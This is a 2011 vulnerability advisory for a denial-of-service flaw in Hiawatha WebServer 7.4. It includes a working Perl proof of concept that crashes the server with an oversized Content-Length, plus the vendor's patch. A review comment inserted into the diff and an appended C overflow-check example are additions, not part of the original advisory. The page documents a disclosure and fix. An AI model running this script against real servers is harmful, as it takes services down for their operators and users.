
Hiawatha WebServer 7.4 Denial Of Service

07 Mar 2011 | Reported by ipax | Type: packetstorm | Source: packetstormsecurity.com

Hiawatha WebServer 7.4 miscalculates the Content-Length header, so a crafted HTTP request can crash the server (denial of service).

`[Discussion]  
- DcLabs Security Research Group advises about the following vulnerability(ies):  
  
[Software]  
- Hiawatha WebServer 7.4  
  
[Vendor Product Description]  
- Hiawatha is an open source webserver with a focus on security. I  
started Hiawatha in January 2002. Before that time, I had used several  
webservers, but I didn't like them. They had unlogical, almost cryptic  
configuration syntax and none of them gave me a good feeling about  
their security and robustness. So, I decided it was time to write my  
own webserver. I never thought that my webserver would become what it  
is today, but I enjoyed working on it and liked to have my own open  
source project. In the years that followed, Hiawatha became a fully  
functional webserver.  
  
- Source: http://www.hiawatha-webserver.org/files/hiawatha-7.4.tar.gz  
  
[Advisory Timeline]  
  
- 02/24/2011 -> Advisory sent to vendor.  
- 02/24/2011 -> Vendor response.  
- 02/25/2011 -> Patch suggested by vendor.  
- 03/04/2011 -> Advisory published.  
  
[Bug Summary]  
  
- Content-Length entity-header field miscalculation.  
  
[Impact]  
  
- Low  
  
[Affected Version]  
  
- 7.4  
- Prior versions can also be affected but weren't tested.  
  
[Bug Description and Proof of Concept]  
  
- The web server crashes while sending specially crafted HTTP requests  
leading to Denial of Service.  
  
[PoC]  
  
# Hiawatha Web Server 7.4  
#!/usr/bin/perl  
use IO::Socket;  
if (@ARGV < 1) {  
usage();  
}  
$ip = $ARGV[0];  
$port = $ARGV[1];  
print "[+] Sending request...\n";  
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr =>  
"$ip", PeerPort => "$port") || die "[-] Connection FAILED!\n";  
print $socket "OPTIONS * HTTP/1.1\r\n";  
print $socket "Host: http://www.dclabs.com.br\r\n";  
print $socket "Content-Length: 2147483599\r\n\r\n";  
sleep(3);  
close($socket);  
print "[+] Done!\n";  
  
sub usage() {  
print "[-] Usage: <". $0 ."> <host> <port>\n";  
print "[-] Example: ". $0 ." 127.0.0.1 80\n";  
exit;  
}  
  
All flaws described here were discovered and researched by:  
Rodrigo Escobar aka ipax.  
DcLabs Security Research Group  
ipax (at) dclabs <dot> com <dot> br  
  
[Patch(s) / Workaround]  
  
-- hiawatha.c --  
  
-- BEGIN --  
20a21  
> #include <limits.h>  
421c422  
< if  
(content_length < 0) {  
---  
> if ((content_length < 0) || (INT_MAX - content_length -2 <= header_length)) {  
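Review bot: on changed line 422, the literal 2 in "INT_MAX - content_length -2 <= header_length" is unexplained; a short comment or a named constant saying which two bytes it accounts for would make the bound checkable. The types of content_length and header_length are not visible in this diff, so confirm both are int, since INT_MAX is the wrong limit otherwise. The condition also rejects only sums that reach INT_MAX, so a Content-Length just below that is still accepted; an explicit maximum request size checked at the same point would be a stronger guard.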
-- END --  
  
[Greetz]  
  
DcLabs Security Research Group.  
  
--  
Rodrigo Escobar (ipax)  
Pentester/Researcher Security Team @ DcLabs  
http://www.dclabs.com.br  
`
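The size check the patch introduces, written out as an added C example (not code from Hiawatha or from the advisory): a strict Content-Length parse, a test for whether header plus body plus 2 still fits in an int, and a validation routine that uses the subtraction form of the guard. It assumes the server sizes a request as header_length + content_length + 2 in an int, which the patch condition implies but the page does not show; the function names, MAX_BODY and the header size of 82 are constructed for the illustration.

```c
#include <errno.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>

#define MAX_BODY (1024L * 1024L) /* assumed policy cap, not a Hiawatha setting */

/* Strict Content-Length parse: digits only, no sign, no trailing bytes.
 * Returns 0 and stores the value, or -1 on malformed or out-of-range input. */
int parse_content_length(const char *s, long *out) {
    char *end;
    if (s == NULL || *s < '0' || *s > '9') return -1;
    errno = 0;
    long v = strtol(s, &end, 10);
    if (errno == ERANGE || *end != '\0') return -1;
    *out = v;
    return 0;
}

/* 1 if header + body + 2 cannot be held in an int. Computed in long long
 * so the demonstration itself never overflows. */
int sum_exceeds_int(int header_length, long content_length) {
    return (long long)header_length + content_length + 2 > INT_MAX;
}

/* Accept or reject a request before any buffer is sized from it.
 * Returns 0 and stores the total size, or -1 to reject. */
int check_request_size(const char *cl_value, int header_length, int *total) {
    long cl;
    if (header_length < 0 || parse_content_length(cl_value, &cl) != 0) return -1;
    if (cl > MAX_BODY) return -1;                          /* policy cap */
    if (cl > (long)INT_MAX - 2 - header_length) return -1; /* overflow guard, subtraction form */
    *total = header_length + (int)cl + 2;
    return 0;
}

int main(void) {
    int total = 0;
    int hdr = 82; /* constructed header size for the demo */
    printf("sum exceeds int: %d\n", sum_exceeds_int(hdr, 2147483599L));
    printf("large value rejected: %d\n", check_request_size("2147483599", hdr, &total));
    int rc = check_request_size("512", hdr, &total);
    printf("small value: rc=%d total=%d\n", rc, total);
    return 0;
}
```

The guard subtracts from INT_MAX instead of adding the two lengths, so the comparison itself cannot overflow; the policy cap rejects oversized bodies long before that limit is reached.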
